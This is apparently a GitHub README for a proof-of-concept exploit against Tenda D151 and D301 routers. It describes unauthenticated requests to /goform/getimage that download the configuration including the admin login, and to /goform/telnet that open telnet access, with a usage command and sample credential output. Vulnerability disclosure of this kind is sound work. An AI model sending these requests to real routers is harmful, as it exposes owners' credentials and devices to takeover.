Tenda D151 D301 exploit (Proof of Concept)

Exploit Title: Tenda D151 & D301 - Unauthenticated configuration download (login included)

Exploit Author: BenChaliah
Vendor Homepage: https://www.tendacn.com
Software Link: https://www.tendacn.com/us/download/detail-3331.html
Versions:
- D301 1.2.11.2_EN
- D301 V2.0 50.22.1.8_EN
- D151 V2.0 50.21.1.5_EN
Exploit-DB : https://www.exploit-db.com/exploits/49782

Description

This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, you can also activate telnet service by requesting /goform/telnet (the service is already on by default, but this will execute an iptable command allowing access).

⚠️ Telnet activation issue exists in many other tenda devices too.

The configuration exists in the last part of the downloaded firmware image.

Usage (Python 2.7):

$ python exploit.py 192.168.1.1
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -- By BenCh@li@h
|   D _]/\ \  -- github.com/BenChaliah
 \___/ / /\ \
      (_ )( _)
          

[!] Downloading config
	username: admin
	password: testpass

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
LICENSE		LICENSE
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Tenda D151 D301 exploit (Proof of Concept)

Description

About

Releases

Packages

Languages

License

mercul1ninna/Tenda_D151_D301_POC

Folders and files

Latest commit

History

Repository files navigation

Tenda D151 D301 exploit (Proof of Concept)

Description

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages